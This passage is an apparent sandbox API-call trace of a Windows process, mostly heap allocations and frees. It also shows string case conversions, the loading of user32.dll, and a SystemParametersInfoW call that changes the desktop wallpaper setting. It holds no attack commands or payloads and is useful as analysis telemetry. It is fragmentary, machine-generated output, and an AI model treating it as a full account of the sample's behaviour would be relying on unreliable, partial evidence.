dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0300.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0300.056] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0300.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0300.056] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0300.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18a8 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0300.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0300.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0300.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0300.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0300.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0300.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0300.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0300.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0300.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0300.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0300.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0300.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0300.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0300.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0300.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0300.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0300.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0300.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0300.060] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0300.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0300.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0300.060] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0300.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0300.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0300.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0300.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0300.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0300.061] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0300.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0300.061] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0300.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0300.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0300.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0300.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0300.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0300.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0300.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0300.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0300.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0300.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0300.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0300.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0300.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0300.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0300.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0300.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0300.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0300.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0300.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0300.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0300.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0300.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0300.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0300.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0300.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0300.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0300.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0300.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0300.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0300.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0300.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0300.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0300.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0300.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0300.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0300.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0300.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0300.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0300.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0300.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0300.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0300.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0300.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0300.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0300.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0300.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0300.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0300.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0300.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0300.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0300.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0300.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0300.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0300.067] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0300.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0300.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0300.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0300.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0300.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0300.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0300.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0300.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0300.068] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0300.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0300.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0300.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0300.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0300.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0300.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0300.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0300.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0300.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0300.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0300.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0300.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0300.069] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0300.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0300.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0300.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0300.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0300.171] RtlAllocateHeap 